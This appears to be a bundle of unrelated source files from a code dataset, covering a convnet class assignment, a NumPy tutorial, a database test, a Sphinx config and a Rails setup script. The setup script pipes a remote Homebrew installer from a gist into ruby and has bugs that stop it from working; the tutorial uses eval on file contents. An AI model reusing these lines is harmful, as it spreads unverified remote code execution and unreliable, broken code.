conv_param = {'stride': 1, 'pad': (W1.shape[2] - 1) / 2}
pool_param = {'stride': 2, 'pool_height': 2, 'pool_width': 2}
dropout_param = {'p': dropout}
dropout_param['mode'] = 'test' if y is None else 'train'
a1, cache1 = conv_relu_pool_forward(X, W1, b1, conv_param, pool_param)
a2, cache2 = affine_relu_forward(a1, W2, b2)
if dropout is None:
scores, cache4 = affine_forward(a2, W3, b3)
else:
d2, cache3 = dropout_forward(a2, dropout_param)
scores, cache4 = affine_forward(d2, W3, b3)
if y is None:
return scores
data_loss, dscores = softmax_loss(scores, y)
if dropout is None:
da2, dW3, db3 = affine_backward(dscores, cache4)
else:
dd2, dW3, db3 = affine_backward(dscores, cache4)
da2 = dropout_backward(dd2, cache3)
da1, dW2, db2 = affine_relu_backward(da2, cache2)
dX, dW1, db1 = conv_relu_pool_backward(da1, cache1)
grads = { 'W1': dW1, 'b1': db1, 'W2': dW2, 'b2': db2, 'W3': dW3, 'b3': db3 }
reg_loss = 0.0
for p in ['W1', 'W2', 'W3']:
W = model[p]
reg_loss += 0.5 * reg * np.sum(W * W)
grads[p] += reg * W
loss = data_loss + reg_loss
return loss, grads
def init_five_layer_convnet(input_shape=(3, 64, 64), num_classes=100,
filter_sizes=(5, 5, 5), num_filters=(32, 32, 64, 128),
weight_scale=1e-2, bias_scale=0, dtype=np.float32):
"""
Initialize a five-layer convnet with the following architecture:
[conv - relu - pool] x 3 - affine - relu - dropout - affine - softmax
Each pooling region is 2x2 stride 2 and each convolution uses enough padding
so that all convolutions are "same".
Inputs:
- Input shape: A tuple (C, H, W) giving the shape of each input that will be
passed to the ConvNet. Default is (3, 64, 64) which corresponds to
TinyImageNet.
- num_classes: Number of classes over which classification will be performed.
Default is 100 for TinyImageNet-100-A / TinyImageNet-100-B.
- filter_sizes: Tuple of 3 integers giving the size of the filters for the
three convolutional layers. Default is (5, 5, 5) which corresponds to 5x5
filter at each layer.
- num_filters: Tuple of 4 integers where the first 3 give the number of
convolutional filters for the three convolutional layers, and the last
gives the number of output neurons for the first affine layer.
Default is (32, 32, 64, 128).
- weight_scale: All weights will be randomly initialized from a Gaussian
distribution whose standard deviation is weight_scale.
- bias_scale: All biases will be randomly initialized from a Gaussian
distribution whose standard deviation is bias_scale.
- dtype: numpy datatype which will be used for this network. Float32 is
recommended as it will make floating point operations faster.
"""
C, H, W = input_shape
F1, F2, F3, FC = num_filters
model = {}
model['W1'] = np.random.randn(F1, C, filter_sizes[0], filter_sizes[0])
model['b1'] = np.random.randn(F1)
model['W2'] = np.random.randn(F2, F1, filter_sizes[1], filter_sizes[1])
model['b2'] = np.random.randn(F2)
model['W3'] = np.random.randn(F3, F2, filter_sizes[2], filter_sizes[2])
model['b3'] = np.random.randn(F3)
  model['W4'] = np.random.randn(H * W * F3 / 64, FC)  # three 2x2 pools: (H/8)*(W/8)*F3
model['b4'] = np.random.randn(FC)
model['W5'] = np.random.randn(FC, num_classes)
model['b5'] = np.random.randn(num_classes)
for i in [1, 2, 3, 4, 5]:
model['W%d' % i] *= weight_scale
model['b%d' % i] *= bias_scale
for k in model:
model[k] = model[k].astype(dtype, copy=False)
return model
def five_layer_convnet(X, model, y=None, reg=0.0, dropout=1.0,
extract_features=False, compute_dX=False,
return_probs=False):
"""
Compute the loss and gradient for a five layer convnet with the architecture
[conv - relu - pool] x 3 - affine - relu - dropout - affine - softmax
Each conv is stride 1 with padding chosen so the convolutions are "same";
  all pooling is 2x2 with stride 2.
We use L2 regularization on all weight matrices and no regularization on
biases.
This function can output several different things:
If y not given, then this function will output extracted features,
classification scores, or classification probabilities depending on the
values of the extract_features and return_probs flags.
If y is given, then this function will output either (loss, gradients)
or dX, depending on the value of the compute_dX flag.
Inputs:
- X: Input data of shape (N, C, H, W)
- model: Dictionary mapping string names to model parameters. We expect the
following parameters:
W1, b1, W2, b2, W3, b3: Weights and biases for the conv layers
W4, b4, W5, b5: Weights and biases for the affine layers
- y: Integer vector of shape (N,) giving labels for the data points in X.
If this is given then we will return one of (loss, gradient) or dX;
If this is not given then we will return either class scores or class
probabilities.
- reg: Scalar value giving the strength of L2 regularization.
- dropout: The probability of keeping a neuron in the dropout layer
Outputs:
This function can return several different things, depending on its inputs
as described above.
If y is None and extract_features is True, returns:
  - features: (N, F) array of features, where F is the number of neurons in
    the first affine layer.
If y is None and return_probs is True, returns:
- probs: (N, L) array of normalized class probabilities, where probs[i][j]
is the probability that X[i] has label j.
If y is None and return_probs is False, returns:
- scores: (N, L) array of unnormalized class scores, where scores[i][j] is
the score assigned to X[i] having label j.
If y is not None and compute_dX is False, returns:
- (loss, grads) where loss is a scalar value giving the loss and grads is a
dictionary mapping parameter names to arrays giving the gradient of the
loss with respect to each parameter.
If y is not None and compute_dX is True, returns:
- dX: Array of shape (N, C, H, W) giving the gradient of the loss with
respect to the input data.
"""
W1, b1 = model['W1'], model['b1']
W2, b2 = model['W2'], model['b2']
W3, b3 = model['W3'], model['b3']
W4, b4 = model['W4'], model['b4']
W5, b5 = model['W5'], model['b5']
conv_param_1 = {'stride': 1, 'pad': (W1.shape[2] - 1) / 2}
conv_param_2 = {'stride': 1, 'pad': (W2.shape[2] - 1) / 2}
conv_param_3 = {'stride': 1, 'pad': (W3.shape[2] - 1) / 2}
pool_param = {'stride': 2, 'pool_height': 2, 'pool_width': 2}
dropout_param = {'p': dropout}
dropout_param['mode'] = 'test' if y is None else 'train'
a1, cache1 = conv_relu_pool_forward(X, W1, b1, conv_param_1, pool_param)
a2, cache2 = conv_relu_pool_forward(a1, W2, b2, conv_param_2, pool_param)
a3, cache3 = conv_relu_pool_forward(a2, W3, b3, conv_param_3, pool_param)
a4, cache4 = affine_relu_forward(a3, W4, b4)
if extract_features:
    return a4.reshape((X.shape[0], -1))  # flatten; works for any hidden size
d4, cache5 = dropout_forward(a4, dropout_param)
scores, cache6 = affine_forward(d4, W5, b5)
if y is None:
if return_probs:
probs = np.exp(scores - np.max(scores, axis=1, keepdims=True))
probs /= np.sum(probs, axis=1, keepdims=True)
return probs
else:
return scores
data_loss, dscores = softmax_loss(scores, y)
dd4, dW5, db5 = affine_backward(dscores, cache6)
da4 = dropout_backward(dd4, cache5)
da3, dW4, db4 = affine_relu_backward(da4, cache4)
da2, dW3, db3 = conv_relu_pool_backward(da3, cache3)
da1, dW2, db2 = conv_relu_pool_backward(da2, cache2)
dX, dW1, db1 = conv_relu_pool_backward(da1, cache1)
if compute_dX:
return dX
grads = {
'W1': dW1, 'b1': db1, 'W2': dW2, 'b2': db2,
'W3': dW3, 'b3': db3, 'W4': dW4, 'b4': db4,
'W5': dW5, 'b5': db5,
}
reg_loss = 0.0
for p in ['W1', 'W2', 'W3', 'W4', 'W5']:
W = model[p]
    reg_loss += 0.5 * reg * np.sum(W * W)
grads[p] += reg * W
loss = data_loss + reg_loss
return loss, grads
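# Usage sketch for the different output modes of five_layer_convnet
# (illustrative only; the random inputs below are made up):
#   model = init_five_layer_convnet()
#   X = np.random.randn(2, 3, 64, 64).astype(np.float32)
#   scores = five_layer_convnet(X, model)                       # (2, 100) scores
#   probs  = five_layer_convnet(X, model, return_probs=True)    # rows sum to 1
#   feats  = five_layer_convnet(X, model, extract_features=True)
#   loss, grads = five_layer_convnet(X, model, y=np.array([0, 1]))
#   dX = five_layer_convnet(X, model, y=np.array([0, 1]), compute_dX=True)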
|
UltronAI/Deep-Learning
|
CS231n/reference/cnn_assignments-master/assignment3/cs231n/classifiers/convnet.py
|
Python
|
mit
| 15,991
|
[
"Gaussian",
"NEURON"
] |
5f1da709a74cf49c572d8a8936bca2e82b14c6146e8f06f017176e97d10c01a5
|
#!/usr/bin/env python
"""
Demonstrate basic usage of the numpy package.
"""
from numpy import *
# create an array a of length n, with zeroes and
# double precision float type:
n = 4
a = zeros(n)
print 'zeros(n):', type(a), type(a[0]), a
a = zeros(n, int)      # becomes array of integers (!)
print 'zeros(n)', type(a), a
p = q = 2
a = zeros((p, q, 3))
print 'zeros((p,q,3))', type(a), a
x = linspace(-5, 5, 11)
print 'linspace(-5, 5, 11)', type(x), type(x[0]), x
# arange is possible but not recommended
x = arange(-5, 5, 1, float)
# note: round-off errors may prevent the last element
# in x from being equal to the upper bound 5
x = arange(-5, 5.1, 1) # ensures that 5 is in x
print 'arange(-5, 5.1, 1)', type(x), type(x[0]), x
# better:
from scitools.numpyutils import seq
x = seq(-5, 5, 1)
print 'seq(-5, 5, 1)', type(x), type(x[0]), x
# it is trivial to make accompanying y values:
y = sin(x/2.0)*3.0
print 'y = sin(x/2.0)*3.0:', type(y), type(y[0]), y
# create a NumPy array of a Python list:
pl = [0, 1.2, 4, -9.1, 5, 8]
a = array(pl)
print 'pl = [0, 1.2, 4, -9.1, 5, 8]; '\
'array(pl)', type(a), a
# from nested Python list to NumPy arrays and back again:
x = [0, 0.5, 1]; y = [-6.1, -2, 1.2] # lists
a = array([x, y]) # form 2x3 array (x and y as rows)
# turn 1st row to Python list and use index to locate an entry:
i = a[0,:].tolist().index(0.5)
print 'locate i as index for 0.5 in a', a, 'i:', i
# initialization from a function:
def myfunc(i, j):
return (i+1)*(j+4-i)
# make 3x6 array where a[i,j] = myfunc(i,j):
a = fromfunction(myfunc, (3,6))
print 'fromfunction(myfunc, (3,6))', a, type(a[0,0])
# make a one-dim. array of length n:
n = 1000000
def myfunc2(i):
return sin(i*0.0001)
print '\ncreating arrays of length %5.0E ... ' % (float(n))
import time; t1 = time.clock()
a = fromfunction(myfunc2, (n,))
t2 = time.clock()
cpu_fromfunction = t2 - t1
# alternative initialization via linspace and sin:
a = linspace(1, n, n); a = sin(a*0.0001)
cpu_linspace_sin = time.clock() - t2
print 'fromfunction took', cpu_fromfunction, \
      's and linspace&sin took', cpu_linspace_sin, 's for length', n
# indexing:
a = array([0, 1.2, 4, -9.1, 5, 8])
a.shape = (2,3) # turn a into a 2x3 matrix
print a[0,1] # print entry (0,1)
i=1; j=0
a[i,j] = 10 # assignment to entry (i,j)
print a[:,0] # print first column
a[:,:] = 0 # set all elements of a equal to 0
a = linspace(0, 29, 30)
a.shape = (5,6)
print a
print a[1:3,:-1:2] # a[i,j] for i=1,2 and j=0,2,4
print a[::3,2:-1:2] # a[i,j] for i=0,3 and j=2,4
i = slice(None, None, 3); j = slice(2, -1, 2)
print a[i,j]
a = array([0, 1.2, 4, -9.1, 5, 8])
a.shape = (2,3) # turn a into a 2x3 matrix
# traverse array a:
for i in range(a.shape[0]):
for j in range(a.shape[1]):
a[i,j] = (i+1)*(j+1)*(j+2)
print 'a[%d,%d]=%g ' % (i,j,a[i,j]),
print # newline after each row
print a
for e in a:
print e
for e in a.flat:
print e
for index, value in ndenumerate(a):
print index, value
print 'a.shape = (2,3); a=', a
# turn a into a vector of length 6 again
a.shape = (size(a),) # size(a) returns the total no of elements
print 'a.shape = (size(a),); a=', a
# explicit loop vs vectorized operation:
t0 = time.clock()
b = 3*a - 1
t1 = time.clock()
for i in xrange(len(a)):
b[i] = 3*a[i] - 1
t2 = time.clock()
print '3*a-1: vectorized: %g sec, loop: %g sec' % (t1-t0, t2-t1)
# mathematical functions:
b = clip(b, 0.1, 1.0E+20) # throw away entries < 0.1
c = cos(b) # take the cosine of all entries in b
print 'b = 3*a - 1; b = clip(b, 0.1, 1.0E+20); c = cos(b)', b, c
# these functions are available:
c = sin(b)
c = arcsin(c)
c = sinh(b)
# same functions for the cos and tan families
c = b**2.5 # raise all entries to the power of 2.5
c = log(b)
c = exp(b)
c = sqrt(b)
a = arange(0, 20)
random.seed(10) # fix seed
random.shuffle(a) # in-place modification of a
a.shape = 5,4
print a
max_index = a.argmax()
a1d = a.ravel()
print a1d
# [ 7 10 5 6 3 18 13 2 14 8 17 16 19 12 11 1 0 15 4 9]
max_value = a1d[max_index]
print 'max value = %g for index %d' % (max_value, max_index)
# max value 19 for index 12
print a.max(), a.min()
min_index = a.argmin()
print min_index, a.ravel()[min_index]
print a.min()
print a1d
a1d.sort()
print a1d
print sum(a), sum(a1d)
#190 190
a1d = a1d.clip(min=3, max=12)
print a1d
import sys
a = zeros(5)
print 'a:', a
a *= 3.0
print 'a *= 3.0; a=', a
a -= 1.0
print 'a -= 1.0; a=', a
a /= 3.0
print 'a /= 3.0; a=', a
a += 1.0
print 'a += 1.0; a=', a
a **= 2.0
print 'a **= 2.0; a=', a
a = array([0, 1.2, 4, -9.1, 5, 8])
a.shape = (2,3) # turn a into a 2x3 matrix
# indexing as for Python lists:
a = linspace(-1, 1, 6)
a[2:4] = -1 # set a[2] and a[3] to -1
a[-1] = a[0] # set last element equal to first one
print 'a[2:4] = -1; a[-1] = a[0]; a=', a
# multi-dimensional indexing:
a.shape = (3,2)
print 'a.shape = (3,2); a[:,0]',
print a[:,0] # print first column
print 'a[:,1::2]',
print a[:,1::2] # print second column with stride 2
# type testing:
print 'type a:', type(a)
print 'is a ndarray?', isinstance(a, ndarray)
print 'a.dtype.name:', a.dtype.name
print 'a.dtype.char:', a.dtype.char
print 'a.dtype.itemsize:', a.dtype.itemsize
b = zeros(6, float32)
print 'float64 == float32?', a.dtype == b.dtype
c = zeros(2, float)
print 'float64 == float?', a.dtype == c.dtype
# array methods and attributes:
a = zeros(4) + 3
print 'a:', a
b = a.astype(int)
print 'b:', b
print 'a.item(2):', a.item(2) # more efficient than a[2]
# more efficient than a[3]=-4.5:
a.itemset(3,-4.5)
a.shape = (2,2)
print 'a.ravel:', a.ravel()
a[0,1]=-88 # make a non-symmetric
print 'a.transpose():', a.transpose()
# file reading and writing of NumPy arrays:
a = linspace(1, 20, 20)
a.shape = (2,10)
# ASCII format:
file = open('tmp.dat', 'w')
file.write('Here is an array a:\n')
file.write(repr(a))
# array2string has many options for controlling the
# output of an array as a string, but repr() gives a format
# that can be converted back to an array by eval()
file.close()
# load the array from file into b:
file = open('tmp.dat', 'r')
file.readline() # load first comment line
b = eval(file.read())
file.close()
# b is a perfect copy of a:
if not allclose(a, b, atol=1.0E-12, rtol=1.0E-12):
    print 'Ooops: b is not identical to a; bug in eval(file.read())...'
else:
print 'eval(file.read()) works'
# binary storage:
a1 = a
a2 = a + 3
import cPickle
file = open('tmp.dat', 'wb')
file.write('This is the array a1:\n')
cPickle.dump(a1, file)
file.write('Here is another array a2:\n')
cPickle.dump(a2, file)
file.close()
file = open('tmp.dat', 'rb')
file.readline() # swallow the initial comment line
b1 = cPickle.load(file)
file.readline() # swallow next comment line
b2 = cPickle.load(file)
file.close()
print 'read from binary (pickled) file: b1=', b1[:2,:2], 'b2=', b2[:2,:2]
# pickling NumPy arrays: see also the module scitools.NumPyDB
# binary format using tostring/fromstring:
file = open('tmp3.dat', 'wb')
a_binary = a.tostring()
# store first length (in bytes)
file.write('%d\n%s\n' % (len(a_binary), str(a.shape)))
file.write(a_binary)
file.close()
file = open('tmp3.dat', 'rb')
# load binary data into b:
nbytes = int(file.readline()) # or eval(file.readline())
b_shape = eval(file.readline())
b = fromstring(file.read(nbytes), float)
b.shape = b_shape
file.close()
print 'read from binary file: b=', b
print '\n\n--------- random numbers -------------\n'
n = 10000 # no of random samples
# native Python support for random numbers:
import random as random_number
random.seed(2198) # control the seed
# uniform and random come from Python's standard random module:
print 'random number on (0,1):', random_number.random()
print 'uniform random number on (-1,1):', random_number.uniform(-1,1)
print 'N(0,1) Gaussian random number:', random_number.gauss(0,1)
print 'mean of %d random uniform random numbers:' % n
u = random.random(n) # uniform numbers on (0,1)
print 'on (0,1):', sum(u)/n, '(should be 0.5)'
u = random.uniform(-1,1,n) # uniform numbers on (-1,1)
print 'on (-1,1):', sum(u)/n, '(should be 0)'
# normally distributed numbers:
mean = 0.0; stdev = 1.0
u = random.normal(mean, stdev, n)
m = sum(u)/n # empirical mean
s = sqrt(sum((u - m)**2)/(n-1)) # empirical st.dev.
print 'generated %d N(0,1) samples with\nmean %g '\
'and st.dev. %g using random.normal(0,1,%d)' % (n, m, s, n)
p = sum(u < 1.5)
prob = p/float(n)
print 'probability N(0,1) < 1.5: %.2f' % prob
print '\n\n--------- linear algebra -------------\n'
n = 4
A = zeros((n,n))
x = zeros(n)
b = zeros(n)
for i in range(n):
x[i] = i/2.0 # some prescribed solution
for j in range(n):
A[i,j] = 2.0 + float(i+1)/float(j+i+1)
b = dot(A, x) # matrix-vector product: adjust rhs to fit x
# solve linear system A*y=b:
y = linalg.solve(A, b)
# compare exact x with the y we computed:
if sum(abs(x - y)) < 1.0E-12: print 'correct solution'
else: print 'wrong solution',x,y
# alternative:
if allclose(x, y, atol=1.0E-12, rtol=1.0E-12):
print 'correct solution'
else:
print 'wrong solution', x, y
# test: A times A inverse is the identity matrix:
B = linalg.inv(A)
R = dot(A, B) - eye(n) # residual
R_norm = linalg.norm(R)
print 'Residual R = A*A-inverse - I:', R_norm
d = linalg.det(A)
print 'det(A)=%g' % d
# eigenvalues only:
A_eigenvalues = linalg.eigvals(A)
# eigenvalues and eigenvectors:
A_eigenvalues, A_eigenvectors = linalg.eig(A)
for e, v in zip(A_eigenvalues, A_eigenvectors.T):  # eigenvectors are columns
print 'eigenvalue %g has corresponding vector\n%s' % (e, v)
# the * operator is not what we expect from linear algebra:
print 'A:', A
print 'x:', x
print 'b:', b
print 'A*x =', A*x
print 'b*x =', b*x
print 'dot(A,x) =', dot(A,x)
print 'dot(b,x) =', dot(b,x)
# but with matrix/mat, * behaves as in linear algebra:
x1 = array([1, 2, 3], float)
x2 = matrix(x1)            # or mat(x1)
print 'x2:', x2 # row vector
x3 = mat(x1).transpose()   # column vector
print 'x3:', x3
print 'type(x3):', type(x3)
print 'is x3 a matrix?', isinstance(x3, matrix)
A = eye(3) # identity matrix
A = mat(A)
y2 = x2*A # vector-matrix product
print 'y2:', y2
y3 = A*x3 # matrix-vector product
print 'y3:', y3
# try array*array product:
A = (zeros(9) + 1).reshape(3,3)
y = A*x1 # [A[0,:]*x1, A[1,:]*x1, A[2,:]*x1]
print 'array2D*array1D:', y
B = A + 1
print 'array2D*array2D:', A*B # element-wise product
A = mat(A); B = mat(B)
print 'matrix*matrix:', A*B # matrix-matrix product
# Matlab-style quick generation of arrays:
a = r_[-5:5:1]    # same as arange(-5, 5, 1)
print a
a = r_[-5:5:11j]  # same as linspace(-5, 5, 11)
print a
# concatenate three arrays into one array of length 6:
c1 = zeros(2)+2; c2 = zeros(2)-2; c3 = zeros(2)
a = r_[c1,c2,c3]
print a
# vectorization:
def somefunc(x):
"""Scalar function."""
if x < 0:
return 0
else:
return sin(x)
# auto vectorization through numpy.vectorize:
import numpy
somefuncv = numpy.vectorize(somefunc, otypes='d')
somefuncv.__name__ = "vectorize(somefunc)"
def somefunc_NumPy(x):
r = x.copy()
for i in xrange(size(x)):
if x.flat[i] < 0: # x.flat views x as one-dimensional
r[i] = 0.0
else:
r[i] = sin(x[i])
r.shape = x.shape
return r
def somefunc_NumPy2(x):
"""Vectorized version of somefunc."""
r1 = zeros(len(x), float)
r2 = sin(x)
return where(x < 0, r1, r2)
def somefunc_NumPy2b(x):
"""Vectorized version of somefunc."""
return where(x < 0, 0.0, sin(x))
def somefunc_NumPy3(x):
b = (x > zeros(len(x), float))
return sin(x)*b
def somefunc_NumPy_log(x):
r = zeros(len(x), float)
for i in range(len(x)):
if x[i] <= 0:
r[i] = 0.0
else:
r[i] = log(x[i])
return r
def somefunc_NumPy_logv(x):
x_pos = where(x > 0, x, 1)
r1 = log(x_pos)
r = where(x < 0, 0.0, r1)
return r
somefunc_list = [somefuncv, somefunc_NumPy, somefunc_NumPy2,
somefunc_NumPy2b, somefunc_NumPy3,
somefunc_NumPy_log, somefunc_NumPy_logv]
# check correctness:
x = seq(-2, 2, 2)  # seq was imported from scitools.numpyutils above
print '\nsomefunc_* functions applied to', x
for f in somefunc_list:
print f(x)
n = 5000000
#n = 500000
x = linspace(0, 2, n+1)
print '\nperforming some timings of "somefunc*" implementations...'
from scitools.EfficiencyTable import EfficiencyTable as ET
from scitools.misc import timer
e = ET('vectorization of "somefunc" functions with an if test, n=%d' % n)
for f in somefunc_list[:-2]: # skip the last two log functions
t = timer(f, (x,), repetitions=1)
e.add(f.__name__, t)
print e
print 'end of', sys.argv[0]
|
sniemi/SamPy
|
sandbox/src1/TCSE3-3rd-examples/src/py/intro/NumPy_basics.py
|
Python
|
bsd-2-clause
| 12,819
|
[
"Gaussian"
] |
abda0e4fae4284aa8c7176bc2a44b0d240423b8a78e2c48818db938857d84326
|
"""
Copyright (C) 2004-2015 Pivotal Software, Inc. All rights reserved.
This program and the accompanying materials are made available under
the terms of the under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from mpp.gpdb.tests.storage.lib.sql_isolation_testcase import SQLIsolationTestCase
from mpp.lib.PSQL import PSQL
from mpp.gpdb.tests.storage.lib.uao_udf import create_uao_udf
class UAOFunctionsTestCase(SQLIsolationTestCase):
"""
@tags ORCA
"""
'''
    Test support for user-defined functions on updatable AO (append-only) tables.
    This test suite uses the isolation test case because it makes it easy
    to run statements in utility mode.
'''
sql_dir = 'sql/'
ans_dir = 'expected'
out_dir = 'output/'
@classmethod
def setUpClass(cls):
super(UAOFunctionsTestCase, cls).setUpClass()
create_uao_udf()
def get_ans_suffix(self):
primary_segments_count = PSQL.run_sql_command(
"select 'primary_segment' from gp_segment_configuration where content >= 0 and \
role = 'p'").count('primary_segment') - 1
if primary_segments_count > 1:
return "%sseg" % primary_segments_count
else:
return None
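    # Illustrative behaviour of the suffix logic above (assuming the count
    # query behaves as intended): three primary segments -> "3seg"; a single
    # primary segment -> None.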
|
CraigHarris/gpdb
|
src/test/tinc/tincrepo/mpp/gpdb/tests/storage/uao/uao_udf/test_uao_udf.py
|
Python
|
apache-2.0
| 1,688
|
[
"ORCA"
] |
34f154a75382ad382c3d8a6e38903807a2693e4c28206afcb816af3169f40b7b
|
import os
from os import system
# Exciting stuff!
def linux():
apt("build-essential")
apt("git-core")
apt("ruby")
apt("ruby1.8-dev")
apt("irb")
apt("sqlite3")
apt("libxslt-dev")
apt("libxslt-ruby")
apt("rubygems")
both()
def mac():
mac_check_install_homebrew()
both()
def both():
gem("rails")
gem("sqlite3-ruby")
gem("mongrel")
gem("nokogiri")
# Boring stuff.
def main():
if os.uname()[0] is "Linux":
linux()
if os.uname()[0] is "Darwin":
mac()
if os.uname()[0] is "Windows":
print "Windows is not currently supported."
print "Have you accepted Linus Torvalds as your personal Lord and Saviour yet?"
def apt(package):
    system("sudo aptitude install " + package)
def brew(package):
    if package == "mercurial":
        system("brew install python")
        system("brew install pip")
        system("pip install mercurial")
    else:
        system("brew install " + package)
def gem(pkg):
    system("sudo gem install " + pkg + " --no-ri --no-rdoc")
def mac_check_install_homebrew():
print "Checking to see if you have Homebrew installed"
if sytem("brew -v") == 0:
print "Yup, you've got Homebrew installed"
else:
print "You haven't got Homebrew installed. We'll just install that."
system("ruby -e \"$(curl -fsS http://gist.github.com/raw/323731/install_homebrew.rb)\"")
print "...Phew. That was a lot of work!"
print "You should now have Homebrew. Follow the instuctions above,"
print "then rerun this setup script. ;-)"
if __name__ == "main":
main()
|
geeksoflondon/grid4rails
|
doc/setup.py
|
Python
|
agpl-3.0
| 1,623
|
[
"exciting"
] |
acdb3c610eee04641a34983be43d9ade51ef6c23489473cf011458bfbc65af38
|
# -*- coding: utf-8 -*-
#
# io3d documentation build configuration file, created by
# sphinx-quickstart on Mon Nov 27 12:01:57 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath("../"))
# Mock modules that may be unavailable when the documentation is built (e.g.
# on Read the Docs) so that sphinx.ext.autodoc can still import the package.
import mock
MOCK_MODULES = [
"numpy",
"scipy",
"matplotlib",
"matplotlib.pyplot",
"matplotlib.widgets",
"scipy.io",
"yaml",
"pydicom",
# 'scipy.interpolate', 'scipy.ndimage', 'pycut', 'io3d', 'sed3', 'pysegbase',
# 'pysegbase.pycut', 'sklearn', 'skimage', 'dicom', 'vtk', 'vtk.util',
# 'larcc', 'larcc.VIEW', 'larcc.MKPOL', 'larcc.AA', 'larcc.INTERVALS',
# 'larcc.MAP',
"PyQt5",
"PyQt5.QtCore",
"PyQt5.QtGui", #'web', 'lar2psm',
# 'scipy.ndimage.measurements', 'lar', 'extern.lar', 'splines',
# 'scipy.sparse', 'skimage.filter', 'mapper', 'skelet3d', 'numpy.core',
# 'skimage.filters', 'skimage.restoration','skimage.io',
# 'gzip', 'cPickle',
# 'lbpLibrary', 'skimage.exposure', 'PyQt4.QVTKRenderWindowInteractor',
# 'matplotlib.backends', 'matplotlib.backends.backend_qt4agg', 'numpy.linalg',
# 'PyQt4.Qt', 'matplotlib.figure', 'skimage.morphology', 'gtk',
# 'pysegbase.seed_editor_qt', 'vtk.qt4', 'vtk.qt4.QVTKRenderWindowInteractor',
# 'seg2fem', 'skimage.segmentation', 'skimage.transform', 'matplotlib.patches', 'skimage.feature',
# 'scipy.ndimage.morphology', 'mpl_toolkits', 'mpl_toolkits.mplot3d',
# 'scipy.ndimage.measurement', 'scipy.ndimage.interpolation',
# 'matplotlib.backends.backend_gtkagg', 'cv2', 'skimage.measure', 'dicom2fem',
# 'morphsnakes', 'scipy.ndimage.filters', 'scipy.signal', 'pandas',
# 'scipy.stats', 'io3d.misc', 'lisa.extern.lar', 'scipy.cluster',
# 'scipy.cluster.vq', 'scipy.cluster.vq',
# 'ipdb', 'multipolyfit', 'PIL', 'yaml',
"SimpleITK",
# 'six', 'nearpy', 'SimpleITK', 'lar', 'pandas'
"ruamel.yaml.YAML",
]
#
for mod_name in MOCK_MODULES:
sys.modules[mod_name] = mock.Mock()
# import sklearn
# sklearn.__version__ = '0.0'
# import scipy
# scipy.__version__ = '0.0'
# import pysegbase.pycut
# pysegbase.pycut.methods = ['graphcut']
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.todo",
"sphinx.ext.viewcode",
"sphinx.ext.coverage",
"sphinx.ext.imgmath",
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
source_suffix = [".rst", ".md"]
# source_suffix = '.rst'
# The master toctree document.
master_doc = "index"
# General information about the project.
project = u"io3d"
copyright = u"2017, Miroslav Jirik"
author = u"Miroslav Jirik"
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u"1.2.3"
# The full version, including alpha/beta/rc tags.
release = u"1.2.3"
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ["_build", "Thumbs.db", ".DS_Store"]
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "alabaster"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# This is required for the alabaster theme
# refs: http://alabaster.readthedocs.io/en/latest/installation.html#sidebars
html_sidebars = {
"**": [
"relations.html", # needs 'show_related': True theme option to display
"searchbox.html",
]
}
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = "io3ddoc"
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, "io3d.tex", u"io3d Documentation", u"Miroslav Jirik", "manual")
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [(master_doc, "io3d", u"io3d Documentation", [author], 1)]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
master_doc,
"io3d",
u"io3d Documentation",
author,
"io3d",
"One line description of project.",
"Miscellaneous",
)
]
|
mjirik/io3d
|
docs/conf.py
|
Python
|
mit
| 7,122
|
[
"VTK"
] |
69cc1ea1ef0eb9dbab78fcf8b0488af53f66500fe09c82a0c16c74309ace200a
|
#! /usr/bin/env python
"""
This script lists information about a given Galaxy instance.
"""
########### Import ###########
import os
